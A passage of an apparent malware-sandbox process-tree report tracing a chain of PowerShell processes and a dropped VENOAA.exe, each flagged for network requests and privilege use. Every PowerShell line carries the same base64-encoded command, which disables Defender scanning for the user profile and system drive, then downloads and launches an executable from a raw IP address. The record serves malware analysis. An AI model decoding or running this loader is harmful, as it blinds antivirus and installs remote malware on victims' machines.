        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        32⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        33⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        34⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        35⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        36⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        37⤵
        Executes dropped EXE
        
        PID:896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        38⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        39⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        40⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        41⤵
        Executes dropped EXE
        
        PID:4008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        42⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        43⤵
        Executes dropped EXE
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        44⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        45⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        46⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        47⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        48⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        49⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        50⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        51⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        52⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:364
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        53⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        54⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        55⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB